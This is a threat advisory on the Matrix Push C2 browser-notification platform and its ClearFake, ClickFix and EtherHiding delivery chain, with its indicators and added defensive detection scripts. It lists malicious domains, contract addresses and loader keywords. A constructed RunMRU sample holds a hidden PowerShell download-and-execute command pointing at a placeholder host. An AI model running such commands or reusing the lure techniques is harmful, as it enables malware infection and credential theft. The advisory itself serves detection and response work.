Browser Notification Hijack via Matrix Push C2
Threat Group – Crimeware cluster similar to UNC5142 access brokers and web compromise crews using Matrix Push C2
Threat Type – Browser based C2 platform, phishing delivery system and malware loader sold as a MaaS service
Exploited Vulnerabilities – Abuse of W3C Push API, Service Workers, notification prompts, clipboard and Run dialog through ClickFix, plus EtherHiding on BNB Smart Chain for resilient config, with no public CVEs confirmed
Malware Used – Matrix Push C2, ClearFake and CLEARSHORT JavaScript loaders, EtherHiding config layer, and delivery of Lumma, Vidar, NetSupport RAT, Atomic Stealer and Latrodectus
Threat Score – 6.8 🟠 Elevated. Cross platform browser C2 with blockchain backed config and strong social engineering but still reliant on user interaction and no confirmed browser zero day
Last Threat Observation – 23 November 2025
Overview
The cyber threat landscape in 2025 has experienced a clear shift toward techniques that operate inside the browser rather than within traditional file based executable paths. Matrix Push C2 is at the centre of this change. The platform uses legitimate browser capabilities to establish a persistent Command and Control channel that lives inside the profile data of Chrome, Edge, Firefox and other modern browsers.
ClearFake and CLEARSHORT continue to compromise large numbers of WordPress based sites and inject JavaScript that displays fake browser updates and fabricated verification checks. These lures create a pathway for fake notification prompts and for ClickFix instructions. ClickFix convinces users to copy system commands into the Windows Run dialog or macOS Terminal and press Enter. EtherHiding then uses smart contracts on the BNB Smart Chain to store payload addresses, AES keys and malicious command strings.
Matrix Push C2 is the back end Command and Control system. ClearFake and ClickFix are delivery mechanisms that feed victims into the C2 platform or deliver further payloads. This advisory corrects earlier misunderstandings by clearly separating these elements and providing a combined analysis of their role in the threat ecosystem.
Key findings and strategic implications
The browser is now a primary endpoint
Matrix Push C2 leverages standard web technology to maintain a persistent communication channel through push notifications and background processes. The malicious traffic blends with normal browsing behaviour which makes detection more difficult.
Converged ecosystem
Matrix Push C2 provides the dashboard. ClearFake and CLEARSHORT provide the compromised site delivery. ClickFix takes advantage of user trust in familiar troubleshooting steps. Together they form a mature delivery and execution pipeline.
Resilient infrastructure through blockchain storage
Configuration stored in smart contracts cannot be removed through normal domain takedown processes. Operators rotate payloads and instructions simply by updating contract parameters.
Defensive gaps in browser storage handling
Clearing history or cache does not remove malicious Service Workers. Enterprise remediation must involve direct manipulation of Service Worker directories, LevelDB databases and Firefox permission databases. Policies must be enforced through Group Policy, Intune or other mobile device management platforms.
Cross platform reach
Service Workers and the Push API work across Windows, macOS, Linux and Android. ClearFake and ClickFix campaigns also target macOS and mobile browsers. Traditional Windows centric guidance is no longer sufficient.
Threat landscape correction
Early commentary incorrectly described Matrix Push C2 as a phishing page. Matrix Push C2 is an entire Command and Control platform. ClearFake and ClickFix are delivery techniques. These must be differentiated so that internal detection, tuning and analysis are accurate.
ClearFake delivers JavaScript lures. ClickFix convinces users to execute commands. Matrix Push C2 receives victims, manages campaigns and controls browser based execution. These components can operate independently but are increasingly observed together.
The term fileless is partially correct. Matrix Push C2 does not require a Windows executable for initial persistence, but it still writes Service Worker scripts and database entries into browser profile folders. These artefacts must be examined during any incident investigation.
Technical anatomy of Matrix Push C2
Malicious Service Worker lifecycle
The hook
Users visit compromised sites that show fake update pages or verification prompts. Users are encouraged to click Allow on notification requests as part of a false security check.
Registration and persistence
When the victim accepts notifications the browser downloads a Service Worker from the attacker controlled site. The script is written into the Service Worker directory and persists across sessions.
Push subscription generation
The browser generates a subscription object which includes a vendor hosted endpoint and cryptographic keys that allow the operator to send encrypted messages.
C2 registration
The malicious Service Worker transmits the subscription object to the Matrix Push C2 dashboard. The victim appears in the operator console with browser, operating system, IP address and sometimes extension information.
Command delivery
The operator sends commands through the browser vendor push service. The Service Worker wakes, decrypts the message and carries out instructions such as creating deceptive notifications or redirecting tabs to malicious content.
Dashboard and service model
Key features include victim filtering, geographic and browser targeting, campaign templates impersonating trusted brands and analytics for click through rates. The dashboard can detect common cryptocurrency wallet extensions which allows targeted delivery of phishing notifications.
Web3 specific targeting
Recent campaigns have targeted victims who use cryptocurrency extensions. Operators use these details to deliver deceptive notifications about wallet upgrades, security validation and airdrop claims. These notifications can lead to seed phrase theft or malicious wallet interactions.
Distribution vectors
ClearFake and EtherHiding
ClearFake compromises large numbers of websites and injects loader scripts. Recent variants use EtherHiding where configuration is stored inside smart contracts on the BNB Smart Chain. The loader script queries the contract to retrieve the next stage payload location, decryption keys and ClickFix instructions.
Table 2 Blockchain indicators for ClearFake and EtherHiding
| Indicator type | Value | Purpose |
|---|---|---|
| Wallet address | 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53 | Holds ClearFake related contract sets |
| Wallet address | 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA | Hosts configuration for ClickFix operations |
| Wallet address | 0x8FBA1667BEF5EdA433928b220886A830488549BD | Additional configuration storage |
| Method ID | 0x167d1c4b | Returns AES decryption keys |
| Method ID | 0x4128180a | Returns lure HTML location |
| Method ID | 0x67685e3e | Returns PowerShell or equivalent command strings |
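The contract addresses and method selectors in Table 2 can be matched directly in JSON-RPC traffic. The following is an added example (not code from the advisory or from any of the campaigns described) that flags `eth_call` requests touching those values, as a web proxy or inspection point that sees request bodies could; the sample request bodies are constructed.

```python
"""Flag JSON-RPC eth_call requests that reach the ClearFake/EtherHiding contracts or
method selectors listed in Table 2, e.g. from a web proxy that can see request bodies.
Added example, not part of the advisory; SAMPLE_* bodies are constructed."""
import json

# Addresses are compared lower-cased: RPC clients usually send them that way rather
# than EIP-55 checksummed as Table 2 prints them.
WATCH_ADDRESSES = {
    "0x9179dda8b285040bf381aabb8a1f4a1b8c37ed53",
    "0x53fd54f55c93f9bcca471cd0ccbabc3acbd3e4aa",
    "0x8fba1667bef5eda433928b220886a830488549bd",
}
WATCH_SELECTORS = {
    "0x167d1c4b": "AES decryption keys",
    "0x4128180a": "lure HTML location",
    "0x67685e3e": "command strings",
}

def inspect_rpc_body(body):
    """Return the reasons a JSON-RPC body is suspicious (empty list if clean).
    Handles single and batched requests; non-JSON or non-eth_call traffic is ignored."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    reasons = []
    for req in doc if isinstance(doc, list) else [doc]:
        if not isinstance(req, dict) or req.get("method") != "eth_call":
            continue
        params = req.get("params")
        if not isinstance(params, list) or not params or not isinstance(params[0], dict):
            continue
        to = str(params[0].get("to", "")).lower()
        selector = str(params[0].get("data", "")).lower()[:10]  # "0x" + 4-byte selector
        if to in WATCH_ADDRESSES:
            reasons.append(f"eth_call to watched contract {to}")
        if selector in WATCH_SELECTORS:
            reasons.append(f"selector {selector} returns {WATCH_SELECTORS[selector]}")
    return reasons

# Constructed: a loader-style batch that asks for the lure location then the keys,
# and a benign balance query that must not be flagged.
SAMPLE_LOADER = json.dumps([
    {"jsonrpc": "2.0", "id": 1, "method": "eth_call", "params": [
        {"to": "0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA", "data": "0x4128180a"}, "latest"]},
    {"jsonrpc": "2.0", "id": 2, "method": "eth_call", "params": [
        {"to": "0x53fd54f55c93f9bcca471cd0ccbabc3acbd3e4aa", "data": "0x167d1c4b"}, "latest"]},
])
SAMPLE_BENIGN = json.dumps({"jsonrpc": "2.0", "id": 3, "method": "eth_getBalance",
                            "params": ["0x" + "00" * 20, "latest"]})
```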
ClickFix lures
ClickFix is a social engineering technique that convinces users to run commands through familiar troubleshooting steps. Victims are shown errors that appear to be browser or DNS related. The lure then instructs the user to press the Windows key and R together or open the macOS terminal and then paste a command.
The copied command typically runs PowerShell or mshta with a hidden window. It then downloads payloads disguised as innocent media files. These payloads commonly include files labelled with mp4, mp3 or m4a extensions that actually contain executable script content.
Common filenames include:
- one.mp4
- ajax.mp3
- m41.mp4
- 1a.m4a
- sha589.m4a
- joke.m4a
- walking.mp3
- kangarooing.m4a
These same campaigns often load Matrix Push C2 through browser registration logic or deliver classic infostealers and remote access tools.
Indicators of compromise
Network indicators
All domains are defanged. Replace [.] with a dot only in approved testing environments.
Table 3 Malicious domains and URL patterns
| Domain or pattern | Context |
|---|---|
| alhasba[.]com | Fake browser update sequence |
| 10edveha[.]com | Fake browser update sequence |
| ert67-o9[.]pages[.]dev | ClickFix lure content |
| tour-agency-media[.]pages[.]dev | Lure HTML returned by smart contract |
| human-verify-7u[.]pages[.]dev | Fake verification challenge |
| cleaning-room-device[.]shop | Disguised payload hosting |
| ai.fdswgw[.]shop | Disguised payload hosting |
| mnjk-jk.bsdfg-zmp-q-n[.]shop | Payload storage |
| nbhg-v-iuksdfb-f[.]shop | Payload storage |
| hur-bweqlkjr[.]shop | Multiple payloads including disguised mp4 and m4a files |
| yob-yrwebsdf[.]shop | Multiple payloads |
| discover-travel-agency[.]pro | Large mixed payload set |
| ads-green-pickle-jo[.]shop | Disguised payload files |
| recaptcha-manual[.]shop | kangarooing.m4a and related files |
| recaptcha-verify-4h[.]pro | Associated payload hosting |
| human-verify[.]shop | Lure and payload storage |
| f003.backblazeb2[.]com | Backblaze storage for disguised media payloads |
Host based indicators
Registry artefacts
Investigation should include the RunMRU key at:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Suspicious entries contain:
- powershell
- mshta
- curl
- msiexec
- bitsadmin
- forfiles
Look for encoded commands, unusual Unicode characters or phrases that mimic system documentation.
Process execution
Common process patterns include:
- explorer.exe starting powershell.exe
- Hidden or minimised window styles
- Commands that chain Invoke-WebRequest, DownloadString and Start-Process
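The RunMRU keywords and process patterns above can be turned into a triage routine. This is an added example, not code from the advisory: it scores a command string, whether recovered from a RunMRU value or a process command line, against the traits listed (loader binaries, hidden window styles, encoded commands, non-ASCII characters and comment text that mimics documentation). The RunMRU export it processes is constructed and `example.invalid` is a reserved, non-resolving name.

```python
"""Triage command strings from RunMRU values or process command lines for ClickFix
traits named in this advisory. Added example, not part of the advisory; SAMPLE_RUNMRU
is a constructed export and the heuristics are for triage, not a verdict."""
import re

LOADERS = ("powershell", "mshta", "curl", "msiexec", "bitsadmin", "forfiles")
CHAIN = ("invoke-webrequest", "iwr", "downloadstring", "start-process", "iex")

def normalise_runmru(value):
    """RunMRU stores each command with a literal trailing '\\1' marker; strip it."""
    return value[:-2] if value.endswith("\\1") else value

def triage_command(cmd):
    """Return the suspicious traits found in cmd; an empty list means nothing matched."""
    low, traits = cmd.lower(), []
    if any(re.search(rf"\b{b}(\.exe)?\b", low) for b in LOADERS):
        traits.append("loader binary")
    if re.search(r"-w(indowstyle)?\s+h(idden)?\b", low):
        traits.append("hidden window")
    if re.search(r"-e(nc(odedcommand)?)?\s+[a-z0-9+/=]{20,}", low):
        traits.append("encoded command")
    if sum(k in low for k in CHAIN) >= 2:          # substring match, deliberately loose
        traits.append("download-and-execute chain")
    if any(ord(ch) > 127 for ch in cmd):
        traits.append("non-ASCII characters")
    if re.search(r"#\s*[A-Za-z].*$", cmd):         # PowerShell comment carrying lure text
        traits.append("trailing comment text")
    return traits

def triage_runmru(values):
    """values: RunMRU value name -> data as exported from the key quoted above.
    MRUList (the ordering string) is skipped; only entries with traits are returned."""
    out = {}
    for name, data in values.items():
        if name == "MRUList":
            continue
        traits = triage_command(normalise_runmru(data))
        if traits:
            out[name] = traits
    return out

SAMPLE_RUNMRU = {  # constructed; the base64 in "c" is a placeholder, not a real payload
    "a": 'powershell -w hidden -c "iwr http://example.invalid/joke.m4a | iex" '
         "# I am not a robot - Verification ID: 7731\\1",
    "b": "notepad\\1",
    "c": "powershell -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=\\1",
    "MRUList": "cab",
}
```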
Browser profile artefacts
Chrome and Edge store Service Worker and LevelDB files inside user profile directories. Entries referencing the domains listed above indicate likely compromise.
Firefox stores notification permissions in permissions.sqlite. Any suspicious origin with notification permission should be treated as an indicator.
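Both artefact stores can be checked without a LevelDB parser: the Chrome or Edge Service Worker directory is swept as raw bytes for the refanged domain strings, and Firefox's `permissions.sqlite` is queried for origins holding a notification grant. This is an added example, not code from the advisory; it builds a throwaway, constructed profile tree to run against, refangs Table 3 domains only for string matching and never contacts them, and assumes the `moz_perms` table layout Firefox uses (origin, type, permission).

```python
"""Triage browser profile artefacts for watchlisted origins: sweep a Chrome or Edge
"Service Worker" directory for domain strings and list Firefox origins holding a
notification grant in permissions.sqlite. Added example, not part of the advisory.
The demo profile is constructed; Table 3 domains are refanged only for matching."""
import os, sqlite3, tempfile

WATCHLIST = ["alhasba[.]com", "human-verify-7u[.]pages[.]dev", "recaptcha-manual[.]shop"]

def scan_service_worker_dir(sw_dir, watchlist=WATCHLIST):
    """Map each watchlisted domain to the files under sw_dir that contain it. Files are
    read as raw bytes so LevelDB .ldb/.log and ScriptCache blobs need no parser."""
    needles = {d: d.replace("[.]", ".").encode() for d in watchlist}
    hits = {}
    for root, _dirs, files in os.walk(sw_dir):
        for name in files:
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                blob = fh.read()
            for d, needle in needles.items():
                if needle in blob:
                    hits.setdefault(d, []).append(os.path.relpath(path, sw_dir))
    return hits

def firefox_notification_grants(db_path):
    """Origins with an ALLOW grant (permission=1) of type desktop-notification.
    Every origin returned should be checked against the corporate allow list."""
    con = sqlite3.connect(db_path)
    try:
        rows = con.execute("SELECT origin FROM moz_perms WHERE type='desktop-notification' "
                           "AND permission=1").fetchall()
    finally:
        con.close()
    return sorted(r[0] for r in rows)

def build_demo_profile():
    """Constructed throwaway profile: one planted Service Worker database log and a
    permissions.sqlite with the moz_perms columns Firefox uses (assumed layout)."""
    base = tempfile.mkdtemp(prefix="profile-demo-")
    sw = os.path.join(base, "Service Worker", "Database")
    os.makedirs(sw)
    with open(os.path.join(sw, "000003.log"), "wb") as fh:
        fh.write(b"\x00\x01https://human-verify-7u.pages.dev/sw.js\x00junk")
    con = sqlite3.connect(os.path.join(base, "permissions.sqlite"))
    con.execute("CREATE TABLE moz_perms(id INTEGER PRIMARY KEY, origin TEXT, type TEXT, "
                "permission INTEGER, expireType INTEGER, expireTime INTEGER, modificationTime INTEGER)")
    con.executemany("INSERT INTO moz_perms(origin, type, permission) VALUES (?,?,?)",
                    [("https://recaptcha-manual.shop", "desktop-notification", 1),
                     ("https://mail.example.com", "desktop-notification", 1),
                     ("https://example.org", "desktop-notification", 2)])
    con.commit()
    con.close()
    return base
```

Point `scan_service_worker_dir` at a real `<profile>/Service Worker` directory and `firefox_notification_grants` at a copy of `permissions.sqlite` taken while Firefox is closed.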
File hashes
Hashes are not included in this report due to rapid rotation. Internal teams should maintain ongoing watchlists for recurring payloads such as kangarooing.m4a, joke.m4a and related files.
Mitigation and prevention
Mitigation checklist
Table 4 Security mitigation checklist
| Area | Status | Actions |
|---|---|---|
| Notification prompts blocked by default | | Enforce through GPO or MDM |
| Service Worker artefact monitoring | | Ingest browser folder telemetry into SIEM |
| ClearFake and EtherHiding IoCs loaded | | Maintain updated detection lists |
| PowerShell and RunMRU logging tuned | | Build detection content for encoded and hidden commands |
| macOS and mobile browser policies | | Use device management to enforce notification blocks |
| Crypto wallet risk controls | | Encourage hardware wallets and reduce browser wallet exposure |
| User training on notifications | | Educate users to reject prompts from unknown sites |
| User training on system command execution | | Reinforce approval required for any copy and paste command |
Browser policy controls
Group Policy
Notification prompts should be blocked by default for Chrome and Edge on Windows. Administrators can use exclusive allow lists for essential services such as corporate mail and collaboration platforms.
Intune and other mobile device management tools
Use Settings Catalog profiles to block notification prompts on Windows, macOS and Android where supported.
Detection engineering
Detection strategies should include:
- RunMRU value monitoring
- Process trees where explorer.exe launches powershell.exe
- Alerts for hidden or encoded command execution
- Network detection of media named payloads that return script or executable content
- Push notification monitoring for unusual frequency from browser vendor endpoints
User awareness
User awareness must include:
- A rule that commands found on the web must never be pasted into system tools
- A rule that notification permission prompts from non essential sites must always be denied
- Scenarios that simulate ClearFake and ClickFix behaviour in training exercises
Traditional controls
Email filtering, endpoint protection and multi factor authentication remain essential. Although the initial C2 channel is browser based, the second stage malware families delivered by these campaigns are traditional loaders, stealers and remote access tools.
Risk assessment
Matrix Push C2 is rated as 6.8 in the Elevated category. It is highly capable and easily deployed at scale. The browser based C2 channel provides stealth and persistence. ClearFake and ClickFix dramatically increase its reach. Blockchain backed smart contracts give the operators infrastructure that is difficult to remove.
The threat does not yet reach High because it relies on user interaction and has no confirmed browser exploit. Any future development that removes the requirement for user input or uses a browser exploit chain should trigger an immediate review of this rating.
Remediation guidance
Immediate response
- Close all browser processes.
- Remove or quarantine Service Worker directories and LevelDB entries associated with suspicious origins.
- Reset Firefox permission databases if needed.
- Reset RunMRU entries that contain malicious commands.
- Conduct a full endpoint scan for common follow on payloads.
- Reset credentials used on affected devices.
Long term hardening
- Enforce strict notification control policies.
- Monitor blockchain addresses from Table 2 using cyber intelligence sources.
- Strengthen content management systems to reduce ClearFake infections.
- Expand browser telemetry ingestion into SIEM.
Conclusion
Matrix Push C2 represents a significant evolution in criminal tradecraft. By moving persistence and Command and Control into the browser itself, attackers avoid many traditional detection paths. ClearFake, EtherHiding and ClickFix create a delivery pipeline that is resilient, scalable and increasingly common.
The browser must now be managed as a critical component of the enterprise security posture. Organisations that block notifications, inspect browser storage, train users not to run copy and paste commands and integrate blockchain indicators into their intelligence program will be in a strong position to reduce risk and contain incidents.
Sources
- The Hacker News – Matrix Push C2 Uses Browser Notifications for Fileless, Cross Platform Phishing Attacks – https://thehackernews.com/2025/11/matrix-push-c2-uses-browser.html
- Dark Reading – Matrix Push C2 Tool Hijacks Browser Notifications for Phishing – https://www.darkreading.com/threat-intelligence/matrix-push-c2-tool-hijacks-browser-notifications-phishing